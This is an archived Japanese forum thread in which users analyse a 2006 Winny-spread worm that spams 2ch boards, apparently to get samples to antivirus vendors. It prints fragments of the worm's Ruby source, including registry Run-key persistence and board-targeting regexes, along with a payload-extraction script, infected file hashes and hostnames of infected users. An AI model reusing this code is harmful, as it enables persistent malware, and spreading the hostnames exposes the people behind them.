ID:tCUSJrP30 472 res
2006/03/30 05:39:42 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 05:43:38 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 05:44:17 【HIPHOP】【シングル】【洋楽】eminem redman snoop dogg pharoahe monch krayzie bone dmx eve b.g. jurrassic 5 2pac bizzy bone method man big punisher jadakiss krs-one - hip hop mix 1(1)(1)(4).mp3,,0,0,68c276011bc9c51b389261d37c97c03b,1
2006/03/30 05:50:06 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
>>867
フリーメールの垢取得のときみたいにって事?
数値を画像で表示させるから、専用ブラウザは対応が必要になりますね 対策方法
・Rock + バーボン
・特定のIDを狙いうち >>869
そうそう、あんな感じで
全板空爆されたら、そんな方法しかなさそうだし
>>870
やれそうならやってほしいっすね
せめてスマンテックが対応するまでだけでもいいから >>871
プロバイダへの通報も・・・(まぁ、相手がいることですし。。。数も多いし。。。
>>872
メンテを含め、鯖に負担が掛かるでしょうね。
導入しても即ウイルス作者が対応するでしょうけど。。。
傘スレが機能不全になってからBooできなくなっちゃったぁ。
sage対象までは追いきれないぽ。。。 >>862
かなりイメージに近いですー。
それをパターン別に分類していけばいーかなーと。
そしてパターン別に対応状況確認ってことでー。
すでにもう見られなくなってるパターンもあると思うんですよねー。
そういうのを時系列で整理も必要かなーと。
とりあえずは現時点で書き込んでるのを整理してから、
必要に応じて過去に遡る感じでー。
>>871
ランダムすぎるのでRockは無理ですー。
>>872
>せめてスマンテックが対応するまでだけでもいいから
ウイルス本体さえ送れば、アンチウイルス会社はそこそこ
迅速に対応してくれてるようですー。
だから探したものを迅速に、漏れなく送る必要があるなーと。 【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
ここのスレ、k9Tzvsz7が昨日の深夜、WRuVwZkFが朝から一人で攻撃していますね。
同一人物だとすると、他の攻撃スレには何人かいるので、何種類かの亜種がいる可能性大。 >>874
勇気スレチェックしているようにしてますが
ロダではそれらしいのはまだ出てないようです。 >>874
今のRockには期待してない
新・Rockは1回でも書き込もうとするとバーボン逝き (Rock登録の時に最低**文字以上は必要) ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/292-
hbs80006.hbs.ne.jpがしつこく書き込んでる。
症状が今回のウイルスなので、焼いてください。
いきなり手に入った
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
require 'zlib'
def self_destructive board
#爆撃終了
board.settings['BBS_TITLE'] == 'この板は腐ってる@2ch掲示板'
end
(省略)
load_exec 'AntiDojin.rb.zz'
あふぉかと・・・ zlib使ったこと無いし
perlからzlibの使い方も知らぬ
(中にある)ファイルの日付は昨日(03/29)と今日(03/30 8:50)だった
少し追加
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip kTrEVbYUbc 6,502,611 8a31ae38742cea2d46eb2bb054d3964c
(一般コミック・雑誌) [ジャンプ] [2006-18] テニスの王子様 Genius307.zip k7t40jJlVq 3,069,394 384fa751e8af899e950056e088899f05
以前にも見たような感じでファイルが・・・ >>879
これは送りましたかー?
なんせwinnyが出来ないとファイルも取得できないんですよねー。
そこがネックだったりしますー(うちのプロバイダはwinny遮断してるんでー)。 http://www.google.com/search?num=10&hl=ja&c2coff=1&q=bbs-menu-for-2ch+%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%E9%80%9F%E5%A0%B1&lr=lang_ja
で検索
<A HREF=http:\/\/([!-~]+)\.2ch\.net\/([!-~]+)\/>#{bbsname}<\/A>
にマッチしたやつを取得
['download.txt', 'tab1.txt', 'tab2.txt'].each{|x|
これは・・・
def startup filename
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('AntiDojin Extended by ', filename)
}
end
む。
↓続く コミック系・mp3・ゲームやエロゲーのNoDVDパッチとかで
毎週亜種が増えていく予感
このウイルス作者はダウソ(同人も?)に恨みでもあるのかな?
爆撃のあった板に2get禁止のアレでウイルス対策ソフト使いましょうみたいな
宣伝したほうがいいんじゃないかな
それと2chのトップにウイルス対策ソフトを使えと書く (専ブラ使ってない人向けに)
ウイルス感染者が全員2ch見てる訳ではないと思うけど何もしないよりはいいかと
焼け石に水かもしれませんが・・・ winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
rusu_thre = board.include_title(/ういるす|うぃるす/i)
$exename = 'c:\\:滝川クリトリスv3.exe'
$dataname = 'c:\\:滝川クリトリスv3.dat'
!!
if Time.now.to_i < 1143129600
爆撃の時間指定?
board = TwoChannel::Board.new('comic6', 'doujin')
SymantecAntiVirus 2006/03/27のやつで反応無しっと ぺたぺた
use Compress::Zlib;
$ZoneProcessfile = "e2.bin"; #(該当部分を抜き出しておくこと)
($ZoneProcesssize) = (stat($ZoneProcessfile))[7];
open INFILE,$ZoneProcessfile;
binmode(INFILE);
read(INFILE,$ZoneProcessbindata,$ZoneProcesssize);
close INFILE;
$dest = uncompress($ZoneProcessbindata);
open OFILE,">ruby.rb";
print OFILE $dest;
close
何かの流用とか言うな
まとめ
昨日から同人板へ爆撃が始まったやつっぽい アンチウィルス通報部隊へ
http://kasamatusan.sakura.ne.jp/ → なな → nana11600.zip
受信 : angel
解凍 : rovirus >>885
1143129600 = 2006/03/24(Fri) 01:00:00 JST >>884
その理屈で言うならですねー、ウイルスソフトは結構もう
普及してると思うんですー。
けど、パターンファイルに登録されない限り検出されないんですねー。
だから広がっちゃってるってのが事実だと思うんですー。
検出されるよーにするには、ウイルス本体を送って対応してもらう
必要があるわけですー。
パターンファイルの更新はー、早いところだと毎日やってますからー、
発見したら1日でも早く送るってのが次善の策だと思うんですー。 ***** 31ruby.rb
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼|/i)
774: if share_thre.empty?
***** 33RUBY.RB
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
774: if share_thre.empty?
*****
***** 33ruby.rb
852: begin
853: TwoChannel::set_user_agent
854: board = TwoChannel::Board.new('comic6', 'doujin')
***** 34RUBY.RB
852: begin
853: TwoChannel::set_user_agentdownloa
854: board = TwoChannel::Board.new('comic6', 'doujin')
*****
なんというか
バグ入りで(略 同人に「ういるす」は立ってないな。いまのところ
試しに立ててみる?たぶん
>>862のロの投稿が始まると思うが
焼くことは可能になるけど、暴露されてしまうという諸刃の刃 ビンゴっぽいね
【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
↓
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/
この正規表現がいまいち良く分からない。見た目と違ったマッチになるけど間違った記述なのかな? ・・・・上で貼られたウイルスの感染者はID:WRuVwZkFしかいない気がする。
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/l50
ここにもID:WRuVwZkFがいるが、複数感染してる可能性がある。 >>831の続きですー(comic6も追加)
3/29 12:58:11〜3/30 17:27:15(tmp6)
〜3/30 17:28:07(comic6)
-tmp6-
221-186-221-200.ip1.george24.com 213件
p36003-adsao12honb4-acca.tokyo.ocn.ne.jp 105件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 78件
phoenix.aitai.ne.jp 21件
softbank219062040169.bbtec.net 12件
softbank219052178096.bbtec.net 11件
dhcp-ubr1-0427.csf.ne.jp 11件
cable153064.ont.ne.jp 6件
nissin45079.ccnw.ne.jp 5件
N029029.ppp.dion.ne.jp 3件
135.169.hinocatv.ne.jp 2件
-comic6-
blackcat.reslife.okstate.edu 20件
p927305.aicint01.ap.so-net.ne.jp 15件
nissin45079.ccnw.ne.jp 3件 >>895
どーゆースレタイのスレを立てればいーか整理してー、
理由も添えて、ここに申し込んでみてくださいー。
【実験】書き込めなスレッド スレッド924について2
http://qb5.2ch.net/test/read.cgi/operate/1075184383/ >>894
ISPの共有ホスト (多数)
phoenix.aitai.ne.jp 21件
マンションの共有ホスト (数人)
221-186-221-200.ip1.george24.com 213件 ■ このスレッドは過去ログ倉庫に格納されています